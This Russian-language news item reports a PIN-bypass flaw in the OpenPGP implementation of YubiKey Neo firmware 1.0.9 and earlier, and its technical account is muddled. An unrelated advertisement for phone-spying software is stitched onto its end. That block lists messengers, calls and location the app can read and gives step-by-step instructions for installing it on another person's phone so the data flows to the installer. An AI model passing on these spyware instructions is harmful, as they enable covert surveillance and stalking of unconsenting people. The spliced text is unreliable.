Обнаружена уязвимость в электронном ключе YubiKey Neo

d2daa7f946600ac3fc7870377fa352d9

Реализация OpenPGP в ключе безопасности Yubikey NEO, как сообщает специалист Джои Кастилло, содержит серьёзную ошибку. Данный ключ используется во многих финансовых и банковских структурах, а также для защиты персональных данных и коммерческой тайны предприятий. Новая уязвимость позволяет злоумышленнику, обладающему хотя бы малыми локальными привилегиями, успешно обходить ввод PIN-кода. Ключ безопасности предназначается для генерации одноразовых паролей во всех системах, где присутствует USB-порт. До текущего момента ничего более надёжного в этой области не существовало.

Примечательно, что бюллетень с описанием уязвимости уже появился в официальном блоге разработчиков Yubikey, так что пользователи смогут рассчитывать на скорый выход заплатки. В отчёте указывается, что в исходном коде присутствует серьёзная ошибка, связанная с программной логикой устройства. Поэтому злоумышленник может проникнуть в систему даже в том случае, если введёт неправильный PIN-код на стартовом экране.

Ошибка располагается в первой же строке дешифрования, данный элемент кода отвечает за аутентификацию и проверку цифровой подписи. Брешь затрагивает версию прошивки YubiKey Neo 1.0.9 и более ранние. Разработчики уверяют, что достаточно будет приобрести более свежую версию, где эта уязвимость автоматически устраняется. Там используются несколько иные алгоритмы.

Производитель подчёркивает, что обладающие определёнными навыками злоумышленники смогут обойти YubiKey Neo совсем иными способами, никак не связанными с найденной логической ошибкой. Поэтому не следует воспринимать данное устройство в качестве панацеи и универсального решения на все случаи жизни.

Среди клиентов компании это заявление уже вызвало череду возмущений. Многие пользователи считают, что производитель старается преуменьшить серьёзность бреши, дабы воздержаться от выпуска затратного апдейта. Прямое обновление прошивки на устройствах запрещается, сделано это из соображений безопасности. Однако компания-разработчик уже пообещала заменить устройства всем желающим бесплатно.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.